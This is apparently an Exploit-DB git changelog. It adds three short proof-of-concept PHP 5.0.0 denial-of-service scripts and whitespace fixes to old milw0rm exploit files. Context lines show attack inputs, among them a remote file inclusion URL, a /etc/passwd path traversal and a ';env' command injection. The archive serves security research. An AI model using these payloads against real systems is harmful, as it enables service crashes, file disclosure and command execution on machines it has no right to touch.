DB: 2016-08-31

3 new exploits

Too many to list!

platforms/linux/dos/2051.py

@@ -295,3 +295,4 @@ xpl=substr(xpl,atom,len(xpl))
 """
 
 # milw0rm.com [2006-07-21]
+      

platforms/linux/local/2031.c

@@ -106,3 +106,4 @@ int main(void)
 }
 
 // milw0rm.com [2006-07-18]
+   

platforms/multiple/remote/2053.rb

@@ -85,3 +85,4 @@ system(cmd)
 sock.close
 
 # milw0rm.com [2006-07-21]
+   

platforms/php/dos/40313.php

@@ -0,0 +1,15 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 imap_mail() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("imap")) die("You need imap extension loaded!");
+
+$str = str_repeat('A', 9999);
+imap_mail($str,'','');
+?>      

platforms/php/dos/40314.php

@@ -0,0 +1,14 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
+
+hw_docbyanchor(0,0);
+?>      

platforms/php/dos/40315.php

@@ -0,0 +1,15 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 html_doc_file() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
+
+$str = str_repeat('A', 9999);
+html_doc_file($str);
+?>      

platforms/php/webapps/2032.pl

@@ -249,3 +249,4 @@ for ($k=0;$k<=$#ARR;$k++)
 #========================================================================================================
 
 # milw0rm.com [2006-07-18]
+      

platforms/php/webapps/2035.php

@@ -137,3 +137,4 @@ echo "Exploit failed...";
 ?>
 
 # milw0rm.com [2006-07-18]
+      

platforms/php/webapps/2050.php

@@ -146,3 +146,4 @@ echo "exploit failed...";
 ?>
 
 # milw0rm.com [2006-07-21]
+      

platforms/php/webapps/2068.php

@@ -217,3 +217,4 @@ else
 ?>
 
 # milw0rm.com [2006-07-24]
+   

platforms/php/webapps/2088.php

@@ -258,3 +258,4 @@ echo "----------------------------------------------------------\n";
 ?>
 
 # milw0rm.com [2006-07-30]
+      

platforms/php/webapps/2095.txt

@@ -22,3 +22,4 @@
 ##############################################################################
 
 # milw0rm.com [2006-07-31]
+      

platforms/php/webapps/2096.txt

@@ -53,3 +53,4 @@ EAR.php/&cmd=ls
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-07-31]
+   

platforms/php/webapps/2098.txt

@@ -45,3 +45,4 @@
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2100.txt

@@ -46,3 +46,4 @@
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2102.txt

@@ -36,3 +36,4 @@
 =================================================================
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2114.htm

@@ -17,3 +17,4 @@ document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"u
 </script>
 
 # milw0rm.com [2006-08-02]
+      

platforms/php/webapps/2116.txt

@@ -23,3 +23,4 @@ POC:
 http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/?
 
 # milw0rm.com [2006-08-02]
+      

platforms/php/webapps/2117.php

@@ -306,3 +306,4 @@ else echo ("specify an action [1-4]...");
 ?>
 
 # milw0rm.com [2006-08-03]
+      

platforms/php/webapps/2118.php

@@ -260,3 +260,4 @@ echo "exploit failed...";
 ?>
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/2123.txt

@@ -19,3 +19,4 @@ SirDarckCat
 elhacker.net
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/2128.txt

@@ -28,3 +28,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root
 #Pozdro dla wszystkich ;-)
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/37389.txt

@@ -115,3 +115,4 @@ The attacker can now log as superlibrarian.
 Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
 Alice needs to have access to the OPAC interface and to have permissions to create public lists.
 
+   

platforms/php/webapps/6733.txt

@@ -16,3 +16,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
 http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
 
 # milw0rm.com [2008-10-12]
+      

platforms/windows/dos/2039.pl

@@ -36,3 +36,4 @@ do
 } while (true);
 
 # milw0rm.com [2006-07-20]
+      

platforms/windows/local/2094.c

@@ -272,3 +272,4 @@ void std_err(void) {
 }
 
 // milw0rm.com [2006-07-31]
+